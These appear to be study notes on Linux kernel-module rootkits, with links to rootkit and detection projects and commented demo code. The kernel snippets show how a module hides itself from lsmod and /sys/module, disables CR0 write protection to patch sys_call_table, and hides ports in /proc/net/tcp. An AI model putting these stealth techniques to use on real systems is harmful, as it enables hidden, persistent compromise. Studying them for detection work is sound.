Tutorials
Series 1
Series 2
Linux Rootkits Part 1: Introduction and Workflow
Miscellaneous
Videos
Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 1
Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 2
Linux LKM Rootkit Tutorial | Protect Yourself From MALICIOUS LKM with rkhunter & chkrootkit | Part 3
Projects
rootkits
- https://github.com/mncoppola/suterusu
- 字节 https://github.com/peaceSh4wn/research-rootkit
- https://github.com/peaceSh4wn/Diamorphine
- https://github.com/peaceSh4wn/Reptile
- https://github.com/peaceSh4wn/vlany
- https://github.com/peaceSh4wn/bdvl
- https://github.com/peaceSh4wn/rootkit
- https://github.com/peaceSh4wn/lkm-rootkit
- rootkit detection https://github.com/peaceSh4wn/chkrootkit
- rootkit detection https://github.com/peaceSh4wn/tyton
hids
Notes
- Header files
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
- Registration and unloading (the functions run at insmod and rmmod)
module_init(func)
module_exit(func)
- Basic skeleton (function names and the MODULE_* strings are placeholders; the empty MODULE_*() macros in the original do not compile)
static int __init rootkit_init(void)
{
	return 0;   /* non-zero aborts the load */
}
static void __exit rootkit_exit(void)
{
}
MODULE_AUTHOR("author");
MODULE_LICENSE("GPL");   /* anything else taints the kernel and hides GPL-only exports from the module */
MODULE_DESCRIPTION("description");
MODULE_VERSION("0.1");
module_init(rootkit_init);
module_exit(rootkit_exit);
https://blog.csdn.net/whatday/article/details/96986296
https://xcellerator.github.io/posts/linux_rootkits_02/
Hiding from lsmod (lsmod reads /proc/modules, which walks the global `modules` list)
#include <linux/list.h>
static inline void list_del_init(struct list_head *entry);   /* prototype as in list.h */
// call from the __init function: unlinks this module from `modules` and re-initialises the node
// to point to itself, so a later list_del on it does not corrupt the list
list_del_init(&__this_module.list);
// caveat: rmmod looks the module up on that same list, so the module can no longer be unloaded
// unless it saved __this_module.list.prev beforehand and re-inserts itself with list_add()
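What list_del_init() does to the module list, shown with an added userspace example that is not code from the page or from any of the projects listed above: a re-implementation of the kernel's intrusive list (the struct list_head, list_add, list_del_init and list_for_each_entry names mirror linux/list.h but are written here), a constructed `modules` list of three entries, a hide that saves the predecessor node and an unhide that re-inserts after it. The module names, and the `module_previous` / `module_hidden` state that mirrors the Diamorphine pattern, are assumptions of this demo.

```c
#include <stddef.h>
#include <string.h>

/* Minimal clone of the kernel's intrusive list (linux/list.h). */
struct list_head { struct list_head *next, *prev; };

#define LIST_HEAD_INIT(name) { &(name), &(name) }
#define container_of(ptr, type, member) \
	((type *)((char *)(ptr) - offsetof(type, member)))
/* Walk the list; `pos` is the containing struct, not the list node. */
#define list_for_each_entry(pos, head, member)                              \
	for (pos = container_of((head)->next, __typeof__(*pos), member);        \
	     &pos->member != (head);                                            \
	     pos = container_of(pos->member.next, __typeof__(*pos), member))

/* Insert `entry` immediately after `prev` (same contract as the kernel's list_add). */
static void list_add(struct list_head *entry, struct list_head *prev)
{
	entry->next = prev->next;
	entry->prev = prev;
	prev->next->prev = entry;
	prev->next = entry;
}

/* Unlink `entry` and turn it into a self-loop, so a second list_del is harmless. */
static void list_del_init(struct list_head *entry)
{
	entry->prev->next = entry->next;
	entry->next->prev = entry->prev;
	entry->next = entry->prev = entry;
}

/* Stand-in for the kernel's struct module: only the fields the walk needs. */
struct module {
	char name[16];
	struct list_head list;
};

/* Constructed "loaded modules" list; in the kernel this is the global `modules`. */
static struct list_head modules = LIST_HEAD_INIT(modules);
static struct module mods[3] = { { "ext4" }, { "rootkit" }, { "e1000" } };
static int populated;

/* The two pieces of state a rootkit keeps so it can un-hide itself later. */
static struct list_head *module_previous;
static int module_hidden;

static void populate(void)
{
	if (populated)
		return;
	for (size_t i = 0; i < 3; i++)
		list_add(&mods[i].list, modules.prev);   /* append at the tail */
	populated = 1;
}

/* What /proc/modules (hence lsmod) would report: entries reachable from the head. */
int visible_count(void)
{
	struct module *m;
	int n = 0;
	populate();
	list_for_each_entry(m, &modules, list)
		n++;
	return n;
}

int is_visible(const char *name)
{
	struct module *m;
	populate();
	list_for_each_entry(m, &modules, list)
		if (strcmp(m->name, name) == 0)
			return 1;
	return 0;
}

/* Equivalent of list_del_init(&__this_module.list) in the rootkit's __init. */
void hide_module(struct module *m)
{
	populate();
	if (module_hidden)
		return;
	module_previous = m->list.prev;   /* remember where we were */
	list_del_init(&m->list);
	module_hidden = 1;
}

/* Re-insert after the remembered predecessor so rmmod can find the module again. */
void unhide_module(struct module *m)
{
	if (!module_hidden)
		return;
	list_add(&m->list, module_previous);
	module_hidden = 0;
}
```

The self-loop left by list_del_init is the reason to prefer it over list_del here: a hide called twice, or an unload path that touches the node again, stays safe. Without the saved predecessor the module is unreachable for delete_module() and stays resident until reboot.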
Hiding from /sys/module
#include <linux/module.h>
struct module
-> struct module_kobject (the mkobj field)
   -> struct kobject
   -> struct module (back-pointer)
   -> ...
struct module_kobject {   /* abridged */
	struct kobject kobj;
	struct module *mod;
};
// in module.h
extern struct module __this_module;
#define THIS_MODULE (&__this_module)
// in kobject.h
extern void kobject_del(struct kobject *kobj);
// call from the __init function: removes the module's /sys/module/<name> directory
kobject_del(&THIS_MODULE->mkobj.kobj);
// caveat: there is no symmetric re-add for a module's kobject, so this is effectively one-way,
// and unloading the module afterwards can trip the kernel's own sysfs teardown
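A userspace cross-check for the two hiding tricks above, added here as an example that is not part of the page or of the listed projects: a module that only unlinked itself from the `modules` list still has its /sys/module/<name> directory, and one that only removed its kobject still appears in /proc/modules. The comparison is a pure function exercised on constructed name lists; the live readers (names chosen here) pull the real lists from /proc/modules and /sys/module, keeping only sysfs entries that carry an `initstate` file, because built-in code also gets a directory there.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define MAX_MODS 1024
#define NAME_LEN 64

/* Names present in `a` but absent from `b`; returns how many were written to `out`. */
int names_missing_from(const char *const *a, int na,
                       const char *const *b, int nb,
                       const char **out, int max_out)
{
	int n = 0;
	for (int i = 0; i < na && n < max_out; i++) {
		int found = 0;
		for (int j = 0; j < nb; j++)
			if (strcmp(a[i], b[j]) == 0) { found = 1; break; }
		if (!found)
			out[n++] = a[i];
	}
	return n;
}

/* The first token of a /proc/modules line is the module name. */
int parse_proc_modules_line(const char *line, char *name, size_t len)
{
	size_t i = 0;
	while (line[i] && line[i] != ' ' && line[i] != '\t' && line[i] != '\n' && i + 1 < len) {
		name[i] = line[i];
		i++;
	}
	name[i] = '\0';
	return i > 0;
}

/* Live readers, used only from main(); everything above is testable offline. */
static int read_proc_modules(char names[][NAME_LEN], int max)
{
	FILE *f = fopen("/proc/modules", "r");
	char line[512];
	int n = 0;
	if (!f) return -1;
	while (n < max && fgets(line, sizeof line, f))
		if (parse_proc_modules_line(line, names[n], NAME_LEN)) n++;
	fclose(f);
	return n;
}

static int read_sys_module(char names[][NAME_LEN], int max)
{
	DIR *d = opendir("/sys/module");
	struct dirent *e;
	struct stat st;
	char path[512];
	int n = 0;
	if (!d) return -1;
	while (n < max && (e = readdir(d))) {
		if (e->d_name[0] == '.') continue;
		snprintf(path, sizeof path, "/sys/module/%s/initstate", e->d_name);
		if (stat(path, &st) != 0) continue;   /* built-in: no initstate file */
		snprintf(names[n], NAME_LEN, "%s", e->d_name);
		n++;
	}
	closedir(d);
	return n;
}

int main(void)
{
	static char proc[MAX_MODS][NAME_LEN], sys[MAX_MODS][NAME_LEN];
	const char *pp[MAX_MODS], *sp[MAX_MODS], *missing[MAX_MODS];
	int np = read_proc_modules(proc, MAX_MODS), ns = read_sys_module(sys, MAX_MODS);
	if (np < 0 || ns < 0) { perror("read"); return 1; }
	for (int i = 0; i < np; i++) pp[i] = proc[i];
	for (int i = 0; i < ns; i++) sp[i] = sys[i];
	int n = names_missing_from(sp, ns, pp, np, missing, MAX_MODS);
	for (int i = 0; i < n; i++) printf("in /sys/module but not /proc/modules: %s\n", missing[i]);
	n = names_missing_from(pp, np, sp, ns, missing, MAX_MODS);
	for (int i = 0; i < n; i++) printf("in /proc/modules but not /sys/module: %s\n", missing[i]);
	return 0;
}
```

A module that performed both removals is invisible to this check; catching that needs a kernel-side scanner such as tyton (listed under Projects) or memory forensics rather than a userspace diff.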
disable_protection (clears CR0.WP, bit 16, so the kernel can write to read-only pages such as sys_call_table)
#include <asm/special_insns.h>     /* read_cr0 / write_cr0 */
#include <asm/processor-flags.h>   /* X86_CR0_WP_BIT == 16 */
#include <linux/bitops.h>          /* set_bit / clear_bit */
void
disable_protection(void) {
	unsigned long cr0 = read_cr0();
	clear_bit(X86_CR0_WP_BIT, &cr0);   /* bit 16 = WP */
	write_cr0(cr0);
}
void
enable_protection(void) {
	unsigned long cr0 = read_cr0();
	set_bit(X86_CR0_WP_BIT, &cr0);
	write_cr0(cr0);
}
// caveat: since Linux 5.3 native_write_cr0() pins the WP bit and puts it back (with a one-time warning),
// so on newer kernels this silently does nothing; a raw `mov %0, %%cr0` in inline asm still works,
// but an ftrace-based hook (see the ftrace refs below) avoids writing to read-only memory altogether
struct kobject is the building block of the kernel device model; every directory under /sys is backed by one, which is why deleting the module's kobject makes /sys/module/<name> disappear.
ftrace refs:
https://blog.csdn.net/sganchang/article/details/91374486
https://blog.csdn.net/dog250/article/details/84667690
https://blog.csdn.net/pwl999/article/details/107426138
https://xz.aliyun.com/t/2948
https://www.apriorit.com/dev-blog/546-hooking-linux-functions-2
https://hackmd.io/@hankluo6/hideproc
https://hackmd.io/@hankluo6
suterusu
Works
- hiding itself
- process hiding
- port hiding
Unreliable
- file hiding
Not implemented
- directory hiding
https://www.j0s1ph.com/?p=5940
Common structs & APIs
intrusive linked list: struct list_head
struct seq_file
struct dir_context
list_for_each_entry
list_add
list_del
set_bit(long nr, volatile unsigned long *addr);     /* atomic; addr points at the word, it is not the word */
clear_bit(long nr, volatile unsigned long *addr);
dev_get_flags
proc_filldir
root_filldir
proc_iterate
root_iterate
simple_strtol
copy_from_user
cap_set_full
commit_creds
kfree
kmalloc
DEFINE_SPINLOCK(spinlock);
spin_lock_irqsave
spin_unlock_irqrestore
Why convert to hex? (presumably because /proc/net/tcp and /proc/net/tcp6 print addresses and ports in hexadecimal, so anything that matches a port in that output has to compare against the hex form)
hijack_start    install the hook (patch a jump into the target function)
hijack_pause    temporarily restore the target's original bytes so the hook can call the original; the hook's own logic follows
hijack_resume   re-apply the jump once the original has returned
hijack_stop     remove the hook
disable_wp
restore_wp
kallsyms_on_each_symbol   (unexported from modules in Linux 5.7 together with kallsyms_lookup_name; on newer kernels rootkits usually recover kallsyms_lookup_name's address with a kprobe instead)
arm_write_hook
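The hex question above, answered with an added example that is neither the page's nor suterusu's code: /proc/net/tcp prints each socket's local and remote endpoints as `HEXIP:HEXPORT`, with the IPv4 address in host byte order (so 127.0.0.1 reads 0100007F on little-endian x86). A tcp4_seq_show hook that hides a port has to compare the port's hex form, or decode the field as done here; the same parser flags those lines from the detection side. The sample lines are constructed; local_port_of(), decode_ipv4(), port_to_hex() and count_hidden() are names chosen for this demo.

```c
#include <stdio.h>
#include <string.h>

/* Local port of one /proc/net/tcp data line; -1 for the header or a malformed line. */
int local_port_of(const char *line)
{
	unsigned int sl, ip, port;
	/* "   0: 0100007F:0016 00000000:0000 0A ..." */
	if (sscanf(line, " %u: %8x:%4x", &sl, &ip, &port) != 3)
		return -1;
	return (int)port;
}

/* Decode the little-endian hex IPv4 field into dotted form (static buffer). */
const char *decode_ipv4(unsigned int raw)
{
	static char buf[16];
	snprintf(buf, sizeof buf, "%u.%u.%u.%u",
	         raw & 0xff, (raw >> 8) & 0xff, (raw >> 16) & 0xff, (raw >> 24) & 0xff);
	return buf;
}

/* The hex form a string-matching hook would search for, e.g. ":0016" for port 22. */
void port_to_hex(int port, char *out, size_t len)
{
	snprintf(out, len, ":%04X", port);
}

/* 1 if the line belongs to a socket bound to `port`: what a hiding hook skips, or a detector flags. */
int line_has_local_port(const char *line, int port)
{
	return local_port_of(line) == port;
}

/* Constructed sample in the real /proc/net/tcp layout. */
static const char *sample[] = {
	"  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
	"   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0",
	"   1: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1 0000000000000000 100 0 0 10 0",
	"   2: 0100007F:A1B2 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 1236 1 0000000000000000 20 4 0 10 -1",
};

/* How many sample lines a hook hiding `port` would drop. */
int count_hidden(int port)
{
	int n = 0;
	for (size_t i = 0; i < sizeof sample / sizeof sample[0]; i++)
		n += line_has_local_port(sample[i], port);
	return n;
}

int main(void)
{
	char hex[8];
	port_to_hex(22, hex, sizeof hex);
	printf("port 22 appears as \"%s\"\n", hex);
	for (size_t i = 0; i < sizeof sample / sizeof sample[0]; i++) {
		unsigned int sl, ip, port;
		if (sscanf(sample[i], " %u: %8x:%4x", &sl, &ip, &port) == 3)
			printf("%s:%u -> %s\n", decode_ipv4(ip), port,
			       line_has_local_port(sample[i], 22) ? "hidden" : "shown");
	}
	return 0;
}
```

Note that only the local port is checked: the third line is the client side of the same SSH connection (remote port 0016) and stays visible, which is exactly the inconsistency a detector can look for after a hook suppresses the listener.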
task_struct
https://www.jianshu.com/p/691d02380312
mm_segment (mm_segment_t with get_fs/set_fs; removed from x86 in Linux 5.10, so code that relies on them no longer builds there)
https://docs.huihoo.com/doxygen/linux/kernel/3.7/structmmsegmentt.html
rootkit
https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html
Source code
https://github.com/peaceSh4wn/research-rootkit/tree/master/1-sys_call_table
how to find sys_call_table (a gentle, comfortable introduction)
https://infosecwriteups.com/linux-kernel-module-rootkit-syscall-table-hijacking-8f1bc0bd099c
- The set_fs and get_fs in that article fail to compile; possibly a typo
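Locating sys_call_table by parsing /proc/kallsyms, as an added example that is not code from the page or from the linked write-up: the kernel prints one `address type name [module]` line per symbol; find_symbol() (a name chosen here) scans a text buffer for an exact name match and returns its address, which is 0 when the symbol is absent or when the address was printed as zeros, the view an unprivileged reader gets under kptr_restrict. The sample buffer and its addresses are constructed; read_kallsyms() loads the live file when run as root. Inside the kernel the equivalent lookup is kallsyms_lookup_name(), which was unexported in 5.7 and is usually reached through a kprobe.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parse one /proc/kallsyms line: "<hex addr> <type> <name>[\t[module]]".
 * Returns 1 on success and fills addr/type/name (name truncated to len-1). */
int parse_kallsyms_line(const char *line, unsigned long *addr, char *type, char *name, size_t len)
{
	char fmt[32];
	snprintf(fmt, sizeof fmt, "%%lx %%c %%%zus", len - 1);   /* e.g. "%lx %c %127s" */
	return sscanf(line, fmt, addr, type, name) == 3;
}

/* Exact-name scan over a kallsyms text buffer; 0 if absent or if the address is hidden. */
unsigned long find_symbol(const char *text, const char *wanted)
{
	const char *p = text;
	while (*p) {
		const char *nl = strchr(p, '\n');
		size_t n = nl ? (size_t)(nl - p) : strlen(p);
		char line[256];
		unsigned long addr;
		char type, name[128];
		if (n >= sizeof line)
			n = sizeof line - 1;
		memcpy(line, p, n);
		line[n] = '\0';
		if (parse_kallsyms_line(line, &addr, &type, name, sizeof name) && strcmp(name, wanted) == 0)
			return addr;
		if (!nl)
			break;
		p = nl + 1;
	}
	return 0;
}

/* Constructed sample in the real layout; the addresses are made up. */
static const char sample[] =
	"ffffffff81000000 T _stext\n"
	"ffffffff82001a80 R ia32_sys_call_table\n"
	"ffffffff82000280 R sys_call_table\n"
	"ffffffff82001e40 R x32_sys_call_table\n"
	"ffffffffc0a01000 t hidden_fn\t[rootkit]\n";

/* Read the live file; needs root (or kptr_restrict=0), otherwise every address reads as 0. */
static char *read_kallsyms(void)
{
	FILE *f = fopen("/proc/kallsyms", "r");
	size_t cap = 1 << 20, used = 0, got;
	char *buf;
	if (!f)
		return NULL;
	buf = malloc(cap);
	while (buf && (got = fread(buf + used, 1, cap - used - 1, f)) > 0) {
		used += got;
		if (used + 1 >= cap) {
			cap *= 2;
			buf = realloc(buf, cap);
		}
	}
	if (buf)
		buf[used] = '\0';
	fclose(f);
	return buf;
}

int main(void)
{
	char *live;
	printf("sample: sys_call_table = %#lx\n", find_symbol(sample, "sys_call_table"));
	live = read_kallsyms();
	if (live) {
		unsigned long a = find_symbol(live, "sys_call_table");
		printf("live:   sys_call_table = %#lx%s\n", a,
		       a ? "" : " (zero: not root / kptr_restrict set, or symbol absent)");
		free(live);
	}
	return 0;
}
```

The exact strcmp matters: ia32_sys_call_table and x32_sys_call_table sit next to the 64-bit table in the same file, and a substring match would pick whichever comes first.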
Need to stay focused!